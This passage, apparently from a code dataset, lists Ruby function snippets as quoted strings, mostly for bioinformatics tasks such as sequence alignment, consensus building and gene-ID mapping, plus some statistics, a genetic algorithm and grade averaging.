"def map_tgup_by_proteinid()\n # output unmatch list for map by gene_id (prefix of gene_id is first char of gene_id. (\"1\", \"2\", ..))\n refg_output = {}\n FileUtils.mkdir_p(\"#{$prepare_dir}/refg\") unless File.exist?(\"#{$prepare_dir}/refg\")\n (1..9).each do |prefix|\n refg_output[prefix.to_s] = File.open(\"#{$prepare_dir}/refg/#{prefix.to_s}.dat\", \"w\")\n end\n\n output_header\n\n # try mapping the same prefix of RefSeq data and UniProt data(for performance)\n Dir.glob(\"#{$prepare_dir}/refp/*.dat\") do |input_file|\n # parse data\n refseq_gene_list = []\n protein_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"protein_id prefix: #{protein_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n gene_id_prefix = columns[4].nil? ? \"\" : columns[4][0]\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n $count_nc += refseq_gene_list.size if protein_id_prefix == \"no_protein_id\" # no protein_id on RefSeq\n up_list = load_up_refp(protein_id_prefix) # get same prefix data from UniProt\n\n refseq_gene_list.each do |refseq_data|\n match = false\n output_tax(refseq_data) # output all gene-tax turtle\n unless up_list.nil? # exist prefix on UniProt\n match_list = up_list[refseq_data[:protein_id]]\n unless match_list.nil? # match some uniprot_ids\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid] # ignore unmatch tax\n output_idmap(refseq_data, up_info[:upid])\n match = true\n else # match protein_id but not match tax_id\n output_uptax(up_info)\n $taxup_list[up_info[:taxid]] = true\n $tax_mismatch[\"#{refseq_data[:taxid]}-#{up_info[:taxid]} : #{refseq_data[:protein_id]}\"] = true\n end\n end\n end\n end\n if match == false\n if refseq_data[:gene_id_prefix].nil? ||refseq_data[:gene_id_prefix] == \"\" # can't salvage it by gene_id.\n $no_up += 1\n else # output a file to each prefix of gene_id that can be salvaged by gene_id\n line = [refseq_data[:taxid], refseq_data[:gene_rsrc], refseq_data[:gene_label], refseq_data[:protein_id], refseq_data[:gene_id], refseq_data[:gene_id_prefix]]\n refg_output[refseq_data[:gene_id_prefix]].puts(line.join(\"\\t\"))\n end\n end\n $count += 1\n end\n end\n refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def finalscore(h,flattenarray,originalarray)\r\n # puts \"==>> #{originalarray}\"\r\n max_index = originalarray.each_index.max_by { |i| originalarray[i].size }\r\n # puts \"max index = #{max_index}\"\r\n # puts \"abcscs = #{originalarray[max_index].length}\"\r\n maxsize = originalarray[max_index].length+1\r\n min_index = originalarray.each_index.min_by { |i| originalarray[i].size }\r\n minsize = originalarray[min_index].length+1\r\n frequency = flattenarray.length\r\n # puts \"***** max= #{maxsize} min = #{minsize} f= #{frequency}\"\r\n h.each do |key,value|\r\n # if key == \"B00APE06UA\"\r\n # puts \"value = #{value }\"\r\n # puts \"value[0] = #{value[0] }\"\r\n # puts \"value[1] = #{value[1]}== #{(value[1]-minsize+1)}/#{(maxsize-minsize)}\"\r\n # puts \"value[0] = #{value[0]} == #{value[0].clone}/#{frequency}\"\r\n # end\r\n\r\n # value[0]= 10000*value[0]/frequency\r\n # value[1]= 100*(value[1]-minsize+1)/(maxsize-minsize)\r\n value [1] = 10000*( value[1]/value[0])\r\n # if key ==\"B00APE06UA\"\r\n # puts \"value [1] = #{value[1]}\"\r\n # puts \" ==>>>> #{value[0]} =========#{value[1]} #{(value[1]-minsize+1)}/#{(maxsize-minsize)} \"\r\n # end\r\n total_score = value[0]+value[1]\r\n # puts\" #{total_score}\"\r\n h[key] = total_score\r\n end\r\n return h\r\nend",
"def run\n calculate_ideal_subject_distribution\n\n #p \"population size >>>>>> \" + @population_size.to_s\n #p \"max generations >>>>>> \" + @max_generation.to_s\n\n result = {}\n best_chromosomes = []\n generate_initial_population #Generate initial population \n @max_generation.times do |g|\n\n selected_to_breed = selection #Evaluates current population \n\n offsprings = reproduction selected_to_breed #Generate the population for this new generation\n\n replace_worst_ranked offsprings\n\n #Sort the chromosomes again by fitness after offsprings\n #being merged\n @population.sort! { |a, b| b.fitness <=> a.fitness}\n\n # fs = @population.collect {|x| x.fitness }\n # File.open(\"fitnesses.txt\", \"a\") do |f|\n # f.puts \"generation (#{fs.size}) #{g.to_s} = \" + fs.join(\", \")\n # end\n\n best_chromosomes << @population[0]\n end\n result[:chromosomes] = best_chromosomes\n result[:population_size] = @population_size\n result[:generations] = @max_generation\n return result\n end",
"def compute_buckets(accumulated_distances, points, precision, &block)\n paired_distances_and_points = accumulated_distances.zip(points)\n # hash time points in the same distance buckets with a precision of one fractional digit\n intervals = {}\n paired_distances_and_points.each do |(distance_m, point)|\n distance_km = distance_m / 1000.to_f\n intervals[distance_km.round(precision)] ||= []\n intervals[distance_km.round(precision)] << [distance_m, point.time]\n end\n\n buckets = {}\n begin\n intervals.each do |key, a_list|\n first_distance_m, first_time = a_list.first\n second_distance_m, second_time = a_list.last\n dx_m = second_distance_m - first_distance_m\n dt_seconds = second_time - first_time\n value = block.call dx_m, dt_seconds\n buckets[key] = value if !value.nil? #ignore nil values\n raise 'Error' if !value.nil? && !(value < Float::INFINITY)\n end\n rescue => e\n raise e #TODO: remove this line\n buckets = Hash.new\n end\n buckets\n end",
"def generate_alignment\n raise ArgumentError, 'Missing genome FASTA file.' unless @genome_file\n raise ArgumentError, 'Missing transcripts FASTA file.' unless @transcripts_file\n \n # Prepare the BLAT alignment\n blat = Alignment::BLAT.new(@blat_options.merge({ out_format: :tab, database: @genome_file }))\n \n # Optionally set a permanent file to write the results to\n @alignment_file ||= \"#{@transcripts_file}.alignment\"\n blat.output_file = @alignment_file\n \n puts \"Running BLAT alignment...\" if @verbose\n \n # Run\n result_file = blat.run(@transcripts_file)\n result_file.path\n end",
"def calculate (bs, ap, buffer)\r\n\t\tpair_key = \"#{bs}-#{ap}\"\r\n\t\t@price_histogram[pair_key] = {} if !@price_histogram[pair_key]\r\n\t\t@price_histogram_topx[pair_key] = [] if !@price_histogram_topx[pair_key]\r\n\t\t\r\n\t # age histograms\r\n\t @price_histogram[pair_key].each do |k,v|\r\n\t \t@price_histogram[pair_key][k] = v * ap\r\n\t end\r\n\t # age histograms in top10 list\r\n\t @price_histogram_topx[pair_key].each do |t|\r\n\t \tt[1] = t[1] * ap\r\n\t end\r\n\t \t\r\n\t # calculate which bucket in the histogram the price belongs to\r\n\t bucket = (buffer[P].close / bs).to_i * bs\r\n\t # increase the bucket counter\r\n\t @price_histogram[pair_key][bucket] = (@price_histogram[pair_key][bucket] ? @price_histogram[pair_key][bucket] : 0) + 1\r\n\t\t# if the bucket belongs to the top10 list, increase the counter there too\r\n\t\tcorrected = false\r\n\t\t@price_histogram_topx[pair_key].each do |t|\r\n\t\t\tif t[0] == bucket\r\n\t\t\t\tt[1] = @price_histogram[pair_key][bucket]\r\n\t\t\t\tcorrected = true\r\n\t\t\t\tbreak\r\n\t\t\tend\r\n\t\tend\r\n\t\t\r\n\t\t# add the bucket to the top 10 (if we haven't increased an existing one)\r\n\t\tif !corrected\r\n\t\t\t@price_histogram_topx[pair_key].push([bucket,@price_histogram[pair_key][bucket]])\r\n\t\tend\r\n\t\t# re-sort the top10 prices by counter\r\n\t\t@price_histogram_topx[pair_key] = @price_histogram_topx[pair_key].sort_by { |k| -1 * k[1] }\r\n\t\t# chop off the last element to keep top10 array at the right length\r\n\t\tif @price_histogram_topx[pair_key].count > 10\r\n\t\t\t@price_histogram_topx[pair_key].pop\r\n\t\tend\r\n\t\t\r\n\t\t# is there a signal? compare current & previous bucket...\r\n\t\tbucket_current = (buffer[P].close / bs).to_i * bs\r\n\t\tbucket_previous = (buffer[P-1].close / bs).to_i * bs\r\n\t\t# ... if exiting a top10 bucket and entering a regular one - we have a signal!\r\n\t\tif bucket_current != bucket_previous && @price_histogram_topx[pair_key].map{ |t| t[0] }.include?(bucket_previous) && !@price_histogram_topx[pair_key].map{ |t| t[0] }.include?(bucket_current)\r\n\t\t\tif bucket_current > bucket_previous\r\n\t\t\t\treturn \"b\"\r\n\t\t\telse\r\n\t\t\t\treturn \"s\"\r\n\t\t\tend\r\n\t\telse\r\n\t\t\treturn \"h\"\r\n\t\tend\r\n\tend",
"def num_gene_rows\n\n # need width of 1.1 snps to display a gene\n original_gene_space = 1.1\n max_rows = 0\n\n # remove any genes that are outside the bounds of the\n @chromhash.each_value do |chrom|\n minpos = chrom.snp_list.get_min\n maxpos = chrom.snp_list.get_max\n\t\t\tif maxpos < minpos\n\t\t\t\tmaxpos = minpos\n\t\t\t\tminpos = chrom.snp_list.get_max\n\t\t\tend\n deletions = Array.new\n chrom.genes.each do |gene|\n\t\t\t\tif gene.end <= minpos or gene.start >= maxpos\n\t\t\t\t\tdeletions << gene\n\t\t\t\telse\n\t\t\t\t\tif gene.start < minpos\n\t\t\t\t\t\tgene.start = minpos\n\t\t\t\t\tend\n\t\t\t\t\tif gene.end > maxpos\n\t\t\t\t\t\tgene.end = maxpos\n\t\t\t\t\tend\n\t\t\t\tend\t\t\t\n end\n\n deletions.each do |d_gene|\n chrom.genes.delete(d_gene)\n end\n\t\tend\n\n # for each chromosome need to calculate how many rows needed\n # and return max across all chromosomes\n @chromhash.each_value do |chrom|\n minpos = chrom.snp_list.get_min\n maxpos = chrom.snp_list.get_max\n num_snps = chrom.snp_list.get_num_included_snps\n snp_size = (maxpos-minpos)/num_snps\n\n # need approximately space for 3 snps for each label\n # but need to make sure no overlap between adjacent\n\n # sweep through and take out as many as will fit in a row\n # then make second and additional passes for output\n num_genes = chrom.genes.length\n total_indexes = num_genes\n last_snp = 0\n\n # mark ones that are used here\n used_gene = Hash.new\n num_rows = 1\t\t\n while used_gene.length != num_genes\n total_indexes.times do |i|\n # when a gene is placed mark it as done\n\n if used_gene[i] == 1\n next\n end\n # locate ending point (in terms of snps for this gene)\n end_snp = (chrom.genes[i].end.to_f - minpos)/snp_size\n start_snp = (chrom.genes[i].start.to_f - minpos) /snp_size\t\t\t\t\n # line_start and line_end mark location of actual bar on plot\n chrom.genes[i].line_start = start_snp / num_snps\n chrom.genes[i].line_end = end_snp / num_snps\n snp_length = end_snp - start_snp\n chrom.genes[i].alignment = 'middle'\n chrom.genes[i].text_anchor = (end_snp-start_snp)/num_snps + chrom.genes[i].line_start\n gene_space = original_gene_space\n # increase gene space for long gene names\n\t\t\t\t\t# when gene isn't covering a long stretch of genome\n if chrom.genes[i].name.length >=7\n # gene_space += (chrom.genes[i].name.length-6) * 0.15\n gene_space = 2\n end\n\n\t\t\t\n # pad for label around actual location when needed\n if snp_length < gene_space\n start_snp = start_snp - gene_space/2 + snp_length/2\n end_snp = end_snp + gene_space/2 - snp_length/2\n end\n\n # shift start_snp and end_snp if this would be off edge\n if start_snp < 0\n end_snp = end_snp + start_snp.abs\n start_snp = 0\n chrom.genes[i].alignment = 'start'\n chrom.genes[i].text_anchor = start_snp / num_snps\n end\n\n if end_snp > num_snps\n start_snp = start_snp - (end_snp - num_snps)\n\t\t\t\t\t\tstart_snp = 0 if start_snp < 0\n end_snp = num_snps\n chrom.genes[i].alignment = 'end' unless start_snp==0\n chrom.genes[i].text_anchor = 1.0\n end\n\n chrom.genes[i].row = num_rows\n # overlap here so need to skip and check again in next row\n\t\t\t\t\tnext if start_snp < last_snp\n\n # this gene will fit in row\n used_gene[i] = 1\n # reset last_snp\n last_snp = end_snp\n\n end # end loop through genes\n num_rows = num_rows + 1\n last_snp = 0\n end # end while loop\n max_rows = num_rows if num_rows > max_rows\n end #end chromosome\n return max_rows-1\n\n end",
"def score_term word, year_hash, year\n # Must exceed this usage floor\n min_norm_count = 0.000001\n curr_nc = 0.0\n prev_nc = 0.0\n # Get total normalized usage counts over current period\n (year-GROUPSIZE+1).upto(year) do |y|\n begin\n curr_nc += year_hash[y][word][:nc] || 0.0\n rescue\n curr_nc += 0.0\n end\n end\n # Get total normalized usage counts over previous period\n (year-GROUPSIZE*2+1).upto(year-GROUPSIZE) do |y|\n begin\n prev_nc += year_hash[y][word][:nc] || 0.0\n rescue\n prev_nc += 0.0\n end\n end\n\n # Check to prevent divide y zero\n if prev_nc > 0.0\n growth = curr_nc / prev_nc\n else\n growth = 0.0\n end\n\n # Can balance growth with normalized usage; currently\n # only using growth.\n return growth #+ Math.log(nc*1000000)\nend",
"def test_kappa_ir_book\n \n @gold_standard = Retreval::GoldStandard.new\n \n for i in (1..300) do \n @gold_standard.add_judgement :document => \"doc#{i}\", :query => \"query#{i}\", :user => \"Alice\", :relevant => true\n @gold_standard.add_judgement :document => \"doc#{i}\", :query => \"query#{i}\", :user => \"Bob\", :relevant => true\n end\n \n for i in (301..320) do\n @gold_standard.add_judgement :document => \"doc#{i}\", :query => \"query#{i}\", :user => \"Alice\", :relevant => true\n @gold_standard.add_judgement :document => \"doc#{i}\", :query => \"query#{i}\", :user => \"Bob\", :relevant => false\n end\n \n for i in (321..330) do\n @gold_standard.add_judgement :document => \"doc#{i}\", :query => \"query#{i}\", :user => \"Alice\", :relevant => false\n @gold_standard.add_judgement :document => \"doc#{i}\", :query => \"query#{i}\", :user => \"Bob\", :relevant => true\n end\n \n for i in (331..400) do\n @gold_standard.add_judgement :document => \"doc#{i}\", :query => \"query#{i}\", :user => \"Alice\", :relevant => false\n @gold_standard.add_judgement :document => \"doc#{i}\", :query => \"query#{i}\", :user => \"Bob\", :relevant => false\n end\n \n assert_equal(0.7759103641456584, @gold_standard.kappa, \"IR Book kappa test failed!\")\n end",
"def print_align(io, sequences, labels, opts={})\n opts = {:cutoff => 70, :start => 0, :chars => 20}.merge(opts)\n (start, length, chars) = opts.values_at(:start, :cutoff, :chars)\n spacer = \" \"\n\n if opts[:template]\n sequences.unshift(opts[:template])\n labels.unshift(opts[:template_label])\n end\n\n all_stats = Array.new(6,0)\n loop do\n fin = false\n\n max_length = 0\n lines = []\n consensus_line = \"\"\n fragments = sequences.map do |string|\n fin = (start >= string.length )\n break if fin\n\n string_frag = string[start, length]\n\n string_frag\n end ; break if fin\n\n doubles = fragments.zip(labels)\n\n doubles = doubles.select {|frag, _| (frag.size > 0) && (frag =~ /[^-]/) }\n\n max_length = doubles.map {|frag, _| frag.size }.max\n\n (cs, stats) = consensus_string_and_stats( doubles.map {|frag,_| frag } )\n all_stats = all_stats.zip(stats).map {|a,b| a + b }\n\n doubles.push( [cs, \"<CONSENSUS>\"] )\n\n lines = doubles.map {|frag, label| [exactly_chars(label, chars),spacer,frag].join }\n\n ## the counters at the top of the line\n start_s = start.to_s\n finish_s = (start + max_length).to_s\n count_line_gap = max_length - (start_s.size + finish_s.size)\n count_line = [start_s, spacer]\n unless count_line_gap < 1\n count_line << \" \" * count_line_gap\n end\n io.puts [exactly_chars(\"\", chars), spacer, count_line.join].join\n\n io.puts lines.join(\"\\n\")\n\n io.puts \" \" # separator between lines\n start += length\n end\n end",
"def score\n return @score if @score != -1\n prod =\n [p_bases_covered, 0.01].max.to_f * # proportion of bases covered\n [p_not_segmented, 0.01].max.to_f * # prob contig has 0 changepoints\n [p_good, 0.01].max.to_f * # proportion of reads that mapped good\n [p_seq_true, 0.01].max.to_f # scaled 1 - mean per-base edit distance\n @score = [prod, 0.01].max\n end",
"def creat_consensus_base_gap(base_array_input)\n base_array = Array.new(base_array_input)\n consensus_base = '-'\n number_of_bases = base_array.size\n hash_temp = Hash.new(0)\n base_array.each do |base|\n hash_temp[base] += 1\n end\n number_of_gap = hash_temp[\"-\"]\n gap_percentage = (number_of_gap.to_f/number_of_bases.to_f)\n base_array.delete(\"-\")\n h = Hash.new(0)\n if base_array.size >0\n base_array.each do |base|\n h[base] += 1\n end\n max_number = h.values.max\n max_list = []\n h.each do |k,v|\n if v == max_number\n max_list << k\n end\n end\n maxi_list_size = max_list.size\n if maxi_list_size == 1\n consensus_base = max_list.shift\n elsif maxi_list_size >= 3\n consensus_base = \"N\"\n elsif maxi_list_size == 2\n if max_list.include?(\"A\") and max_list.include?(\"T\")\n consensus_base = \"W\"\n elsif max_list.include?(\"A\") and max_list.include?(\"C\")\n consensus_base = \"M\"\n elsif max_list.include?(\"A\") and max_list.include?(\"G\")\n consensus_base = \"R\"\n elsif max_list.include?(\"T\") and max_list.include?(\"C\")\n consensus_base = \"Y\"\n elsif max_list.include?(\"G\") and max_list.include?(\"C\")\n consensus_base = \"S\"\n elsif max_list.include?(\"T\") and max_list.include?(\"G\")\n consensus_base = \"M\"\n end\n end\n end\n if gap_percentage >= 0.75\n consensus_base = \"-\"\n end\n return consensus_base\nend",
"def sub_alignment _value=0\n send_cmd(\"sub_alignment #{_value}\")\n end",
"def traceback(i, j, tn) \n alignment = [\"\", \"\"]\n \n loop do\n t = @ts[tn][1]\n \n # Are we at the end?\n return [alignment] if i == 0 || j == 0\n # If performing a local alignment, has the score dropped below 0?\n return [alignment] if !@align_globally && @ts[tn][0][i][j] <= 0\n \n # Insert as appropriate.\n if t[i][j][0][0] == i - 1\n alignment[0].insert(0, @a[i - 1])\n else\n alignment[0].insert(0, '_')\n end\n if t[i][j][0][1] == j - 1\n alignment[1].insert(0, @b[j - 1])\n else\n alignment[1].insert(0, '_')\n end\n \n # During local alignment, you must implement the following simplification. \n # If you trace back to a cell that contains pointers to a zero in the M \n # matrix and a pointer to a zero in the Ix or Iy matrix, you should only \n # follow the pointer to the zero in the M matrix and terminate your \n # traceback there only. This will prevent you from having alignments \n # that are right-sided substrings.\n \n # If there are multiple possible traceback paths originating in this cell,\n # recurse and follow them individually.\n if t[i][j].size > 1\n # If we are tracing back to a cell with a 0 in the M matrix, we ignore\n # other possible tracebacks.\n if t[i][j].any? {|c| c[2] == :m && @m[c[0]][c[1]] == 0}\n tracebacks = t[i][j].select {|c| c[2] == :m}\n else\n tracebacks = t[i][j]\n end\n \n subalignments = []\n tracebacks.each do |cell|\n traceback(cell[0], cell[1], cell[2]).each do |subalignment|\n subalignments << subalignment\n end\n end\n return subalignments.map do |subalignment|\n [\n subalignment[0] + alignment[0],\n subalignment[1] + alignment[1]\n ]\n end\n end\n \n i, j, tn = t[i][j][0]\n end\n end",
"def calculate_intra_consensus_value\n count=0\n if IntraResidueContact.all(:seq_id => self.seq_id, :first_residue=>self.original_position) || IntraResidueContact.all(:seq_id => self.seq_id, :second_residue=>self.original_position)\n count +=1\n end\n #if !Conseq.first(:aasequence_id => self.AAsequence_id).nil? && Conseq.first(:aasequence_id => self.AAsequence_id).color > 4\n if !Conseq.first(:aasequence_id => self.AAsequence_id).nil? && Conseq.first(:aasequence_id => self.AAsequence_id).score < 0\n count +=1\n end\n if !Xdet.first(:aasequence_id => self.AAsequence_id).nil? && (Xdet.first(:aasequence_id => self.AAsequence_id).correlation > 0.0 || Xdet.first(:aasequence_id => self.AAsequence_id).correlation == -2)\n count +=1\n end\n if !NewCap.first(:seq_id=> self.seq_id, :position_one => self.original_position).nil? || !NewCap.first(:seq_id=> self.seq_id, :position_two => self.original_position).nil?\n count +=1\n end\n self.contact_consensus = count /4\n puts self.contact_consensus\n self.save\n end\n \n def calculate_intra_consensus_value_special\n count=0\n #if !Conseq.first(:aasequence_id => self.AAsequence_id).nil? && Conseq.first(:aasequence_id => self.AAsequence_id).color > 4\n if !Conseq.first(:aasequence_id => self.AAsequence_id).nil? && Conseq.first(:aasequence_id => self.AAsequence_id).score < 0\n count +=1\n end\n if !Xdet.first(:aasequence_id => self.AAsequence_id).nil? && (Xdet.first(:aasequence_id => self.AAsequence_id).correlation > 0.0 || Xdet.first(:aasequence_id => self.AAsequence_id).correlation == -2)\n count +=1\n end\n if !NewCap.first(:seq_id=> self.seq_id, :position_one => self.original_position).nil? || !NewCap.first(:seq_id=> self.seq_id, :position_two => self.original_position).nil?\n count +=1\n end\n self.contact_consensus = count/3\n self.save\n puts self.contact_consensus\n end",
"def averages(grade_hash)\n grade_hash.transform_values{ |num| num.reduce(:+) / num.length }\nend",
"def calcSignificance(inMatrix,totalGenes,bgRate)\n\n #total number of mutations in matrix\n oneCount = inMatrix.rowSums.sum\n \n #calculate the adjustment from the raw matrix, for simplicity (prob should be switched later)\n penalty = calcAdjustment(inMatrix,totalGenes)\n\n #sort the matrix (have already paid the penalty for this)\n inMatrix.sortByRowSums!\n inMatrix.sortByColSums!\n\n @probNullVal = bgRate\n @negProbNullVal = 1-@probNullVal\n \n #calculate d for the matrix\n d = sigCalc(inMatrix) \n\n return d - penalty \nend",
"def find_best_ratio(samples, n, step_sz)\n spam = samples.select { |s| s.kind == :spam }.shuffle\n ham = samples.select { |s| s.kind == :ham }.shuffle\n\n # bests = {\n # :accuracy => {:step => 0, :value => 0.0, :ratio => nil, :mat => nil},\n # :precision => {:step => 0, :value => 0.0, :ratio => nil, :mat => nil},\n # :recall => {:step => 0, :value => 0.0, :ratio => nil, :mat => nil},\n # }\n\n steps = {}\n\n (step_sz).step(0.99, step_sz).each do |i|\n ratio = {:spam => (n * i).round, :ham => (n * (1 - i)).round}\n limited_samples = spam.take(ratio[:spam]) + ham.take(ratio[:ham])\n\n STDERR.puts \"Step %0.2f, #{ratio.inspect}, n=#{ratio.values.reduce(:+)}\" % i\n\n mat = CrossValidate.run(limited_samples, Classifier.fetch(0, :unigram))\n\n steps[i] = {:ratio => ratio, :mat => mat}\n # if mat[:accuracy] > bests[:accuracy][:value]\n # bests[:accuracy] = {:step => i, :value => mat[:accuracy], :ratio => ratio, :mat => mat}\n # end\n\n # if mat[:precision] > bests[:precision][:value]\n # bests[:precision] = {:step => i, :value => mat[:precision], :ratio => ratio, :mat => mat}\n # end\n\n # if mat[:recall] > bests[:recall][:value]\n # bests[:recall] = {:step => i, :value => mat[:recall], :ratio => ratio, :mat => mat}\n # end\n end\n\n steps\n # bests\nend",
"def mafft_consensus(reads, percentID)\n tmp = Tempfile.new(\"maffttmp\", @temp_path)\n reads.each.with_index(1) do |read_inf, index|\n tmp.puts \">#{read_inf.type}_#{read_inf.start_pos}_#{read_inf.end_pos}-v#{index}\"\n tmp.puts read_inf.seq.upcase\n end\n tmp.flush\n\n env = {}\n if @temp_path && !@temp_path.empty?\n env['TMPDIR'] = @temp_path\n end\n cmd = [@mafft, '--nuc', '--ep', '0.0', '--op', '1', '--genafpair', '--maxiterate', '1000', tmp.path]\n res, err, status = Open3.capture3(env, *cmd)\n unless status.success?\n STDERR.puts(\"mafft stderr:\")\n STDERR.puts(err)\n report_error(status, cmd.join(' '), [tmp]) if status.success?\n end\n tmp.close(true)\n\n # makeing a consensus seq\n align_reads = {}\n res.split(\"\\n>\").each do |align_read|\n align_read_ary = align_read.split(\"\\n\")\n if align_read_ary.last == \">\"\n if align_read_ary[0].start_with?('>')\n read_name = align_read_ary[0][1..-1]\n else\n read_name = align_read_ary[0]\n end\n align_reads[read_name] = align_read_ary[1..-2].join(\"\")\n else\n read_name = align_read_ary[0]\n align_reads[read_name] = align_read_ary[1..-1].join(\"\")\n end\n end\n\n aln = Bio::Alignment.new(align_reads.values.sort)\n align_reads_names = []\n consensus = aln.consensus_string(percentID, gap_mode: -1) # threshold =%id\n\n # tcctcgtgg---tcggctaact------------------------------------------------------- B_136582615_136582615-v90\n # tcctcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # tcctcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # tcctcgtggAGGtcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n check = Hash.new(0) # depth1の場所を探し、trimする\n align_reads.each do |read_name, align_seq|\n read_name = read_name[1..-1] if read_name.start_with?(\">\")\n align_seq.each_char.with_index{ |allele, num| check[num] += 1 if allele != \"-\" }\n align_reads_names << [align_seq, read_name]\n end\n max_num = check.keys.max\n\n new_cons = []\n if align_reads_names.size > 2 # multiple-alignmentの場合\n # tcctcgtgg---tcggctaact------------------------------------------------------- B_136582615_136582615-v90\n # ---tcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # 最初の数文字と最後の数文字はdepth1でも消さない\n # >最初\n bef_index = -1\n flg = 0\n check.sort_by { |k, v| k }.each do |index, cnt|\n if flg == 0 and cnt == 1\n bef_index = index\n elsif flg == 1\n break\n else\n flg = 1\n end\n end\n # >最後\n aft_index = max_num + 1\n flg = 0\n check.sort_by{|k,v|k}.reverse.each do |index, cnt|\n if flg == 0 and cnt == 1\n aft_index = index\n elsif flg == 1\n break\n else\n flg = 1\n end\n end\n\n # align_reads_namesのチェック\n align_reads_names.each do |align_seq, read_name|\n new_align_seq = \"\"\n align_seq.each_char.with_index do |seq, num|\n if num <= bef_index || aft_index <= num # 最初と最後のdepth1\n new_align_seq += seq\n elsif check[num] != 1\n new_align_seq += seq\n end\n end\n end\n consensus.each_char.with_index do |seq, num|\n if num <= bef_index or aft_index <= num # 最初と最後のdepth1\n new_cons << seq\n elsif check[num] != 1\n new_cons << seq\n end\n end\n\n # pairwise-alignmentのときは特になにもせずO.K.\n else\n new_cons = [consensus]\n end\n new_cons = new_cons.join(\"\")\n\n return new_cons, reads.size\n end",
"def identify_clusters\n raise ArgumentError, 'Missing BLAT alignment file.' unless @alignment_file\n \n # Pull out all of the hits clustered by the query into an array\n puts \"Reading alignment file...\" if @verbose\n query_hits = []\n IO::BLASTFormat.open(@alignment_file) do |f|\n f.each_query do |query, hits| \n query_hits << hits.select { |hit| hit.e_value <= @e_value }\n end\n end\n \n # Create a status bar to monitor thread process\n pbar = ProgressBar.new(\"Converting Hits\", query_hits.size, STDOUT) if @verbose\n \n # Thread the creation of the entries from the hits\n entries = Utilities::Threader.thread(query_hits, threads: @threads) do |thread_query_hits|\n thread_query_hits.map do |hits|\n pbar.inc if @verbose\n \n # Cluster the hits\n clusters = Alignment::Aligner.cluster_hits(hits, cluster_on: :subject)\n \n # Convert the clusters to entries\n clusters.map { |clustered_hits| create_feature(clustered_hits) }\n end\n end.flatten\n\n # Write the file\n puts \"Writing entries to file...\" if @verbose\n @output_file ||= \"#{@alignment_file}.gff3\"\n IO::GFFFormat.open(@output_file, mode: 'w') do |f|\n f.puts_header\n f.puts(entries, progress_bar: true, id_prefix: @id_prefix)\n end\n \n @output_file\n end",
"def final_letter_grades(grade_hash)\n letter_grade averages grade_hash\nend",
"def final_letter_grades(grade_hash)\n averages = grade_hash.inject({}) { |h, (k,v)| h[k] = letter_grade(v.reduce{|x,n| x += n}/v.length) ; h}\nend",
"def align_pairwise(bioseqs, opt={})\n factory = Bio::ClustalW.new\n clustal_opts = hash_opts_to_clustalopts(opt)\n factory.options = clustal_opts\n template = bioseqs.shift\n start_length = []\n pairwise_aligns = bioseqs.map do |bseq|\n clust_al = clustal_align([template, bseq], factory)\n cl_cons = clust_al.consensus\n aligned_string = clust_al[1].to_s\n #(st, len) = find_good_section(aligned_string, opt[:fidelity_length])\n seq_to_use = \n if opt[:consensus_fidelity]\n cl_cons\n else\n aligned_string\n end\n (st, len) = find_good_section(seq_to_use, opt[:fidelity_length])\n if st\n pristine = aligned_string[st, len].gsub('-','') # pristine read (ends removed)\n clustal_align([template.to_s, Bio::Sequence::NA.new(pristine)], factory)\n else\n warn \"a sequence does not meeting min fidelity! using original alignment\" \n clust_al\n end\n\n end\n end",
"def compute_ruby\n check_frequencies\n #\n # INITIALIZATION\n #\n @r = 0\n sdzero = 0\n @sdr = 0\n @itype = 0\n @ifault = 0\n delta = 0\n \n\n # GOTO (4, 1, 2 , 92), kdelta\n #\n # delta IS 0.0, 0.5 OR -0.5 ACCORDING TO WHICH CELL IS 0.0\n #\n\n if(@kdelta==2)\n # 1\n delta=0.5\n @r=-1 if (@a==0 and @d==0)\n elsif(@kdelta==3)\n # 2\n delta=-0.5\n @r=1 if (@b==0 and @c==0)\n end\n # 4\n if @r!=0\n @itype=3\n end\n\n #\n # STORE FREQUENCIES IN AA, BB, CC AND DD\n #\n @aa = @a + delta\n @bb = @b - delta\n @cc = @c - delta\n @dd = @d + delta\n @tot = @aa+@bb+@cc+@dd\n #\n # CHECK IF CORRELATION IS NEGATIVE, 0.0, POSITIVE\n # IF (AA * DD - BB * CC) 7, 5, 6\n\n corr_dir=@aa * @dd - @bb * @cc\n if(corr_dir < 0)\n # 7\n @probaa = @bb.quo(@tot)\n @probac = (@bb + @dd).quo(@tot)\n @ksign = 2\n # -> 8\n else\n if (corr_dir==0)\n # 5\n @itype=4\n end\n # 6\n #\n # COMPUTE PROBABILITIES OF QUADRANT AND OF MARGINALS\n # PROBAA AND PROBAC CHOSEN SO THAT CORRELATION IS POSITIVE.\n # KSIGN INDICATES WHETHER QUADRANTS HAVE BEEN SWITCHED\n #\n\n @probaa = @aa.quo(@tot)\n @probac = (@aa+@cc).quo(@tot)\n @ksign=1\n end\n # 8\n\n @probab = (@aa+@bb).quo(@tot)\n\n #\n # COMPUTE NORMAL DEVIATES FOR THE MARGINAL FREQUENCIES\n # SINCE NO MARGINAL CAN BE 0.0, IE IS NOT CHECKED\n #\n @zac = Distribution::Normal.p_value(@probac.to_f)\n @zab = Distribution::Normal.p_value(@probab.to_f)\n @ss = Math::exp(-0.5 * (@zac ** 2 + @zab ** 2)).quo(TWOPI)\n #\n # WHEN R IS 0.0, 1.0 OR -1.0, TRANSFER TO COMPUTE SDZERO\n #\n if (@r != 0 or @itype > 0)\n compute_sdzero\n return true\n end\n #\n # WHEN MARGINALS ARE EQUAL, COSINE EVALUATION IS USED\n #\n if (@a == @b and @b == @c)\n calculate_cosine\n return true\n end\n #\n # INITIAL ESTIMATE OF CORRELATION IS YULES Y\n #\n @rr = ((Math::sqrt(@aa * @dd) - 